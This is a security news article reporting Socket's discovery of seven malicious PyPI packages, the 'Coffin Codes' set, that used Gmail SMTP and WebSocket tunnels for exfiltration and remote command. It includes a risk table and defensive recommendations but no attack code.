%20(1).webp?w=1600&resize=1600,900&ssl=1)
A recent investigation by Socket’s Threat Research Team has uncovered a sophisticated campaign using malicious Python packages to establish covert tunnels via Gmail’s SMTP protocol, enabling attackers to exfiltrate data and execute remote commands undetected.
The campaign, which operated through seven packages under the “Coffin Codes” theme, demonstrates a significant escalation in the abuse of trusted cloud services for command and control (C2) operations.
How the Attack Works
The malicious packages Coffin-Codes-Pro, Coffin-Codes-NET2, Coffin-Codes-NET, Coffin-Codes-2022, Coffin2022, Coffin-Grave, and cfc-bsb-were distributed via the Python Package Index (PyPI).
Once installed, these packages establish an encrypted connection to Gmail’s SMTP server using hardcoded credentials.
The malware then sends signals and critical information, such as tunnel port numbers, to attacker-controlled email addresses, effectively bypassing traditional network security measures that typically trust SMTP traffic.
The most advanced variants also establish outbound WebSocket connections, allowing the attacker to issue commands, transfer files, and potentially pivot deeper into the victim’s network.
The process is largely automated, requiring no user interaction, and is difficult to detect due to the use of legitimate protocols and services.
Evolution and Impact
While the earliest version, cfc-bsb, lacked direct exfiltration capabilities, it still posed risks through dynamic tunnel establishment and unverified message handling.
Later versions added explicit email-based exfiltration and hardcoded credentials, increasing their malicious potential.
The attacker’s infrastructure and credentials have remained consistent over several years, indicating a persistent and evolving threat.
The packages have since been removed from PyPI, but the incident highlights the ongoing risks posed by supply chain attacks and the exploitation of trusted cloud services.
Risk Factor Table
| Package Name | Year Released | Exfiltration via Email | WebSocket Tunnel | Hardcoded Credentials | Relative Risk Level |
|---|---|---|---|---|---|
| Coffin-Codes-Pro | 2022 | Yes | Yes | Yes | High |
| Coffin-Codes-NET2 | 2022/2025 | Yes | Yes | Yes | High |
| Coffin-Codes-NET | 2022 | Yes | Yes | Yes | High |
| Coffin-Codes-2022 | 2021 | Yes | Yes | Yes | High |
| Coffin2022 | 2021 | Yes | Yes | Yes | High |
| Coffin-Grave | 2021 | Yes | Yes | Yes | High |
| cfc-bsb | 2021 | No | Yes | No | Moderate |
Recommendations
- Monitor for unusual outbound SMTP traffic, especially to Gmail.
- Verify package authenticity by checking the publisher history and repository links.
- Regularly audit dependencies and use tools like Socket to scan for malicious packages.
- Restrict access to sensitive credentials and use isolated environments for testing third-party code1.
This incident underscores the need for vigilance in open-source software supply chains and the growing sophistication of attackers leveraging trusted protocols for malicious ends.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
%20(1).webp?w=1200&resize=1200,0&ssl=1&description=The campaign, which operated through seven packages under the “Coffin Codes” theme, demonstrates a escalation in the abuse of trusted cloud services for command and control (C2) operations.){kind=link}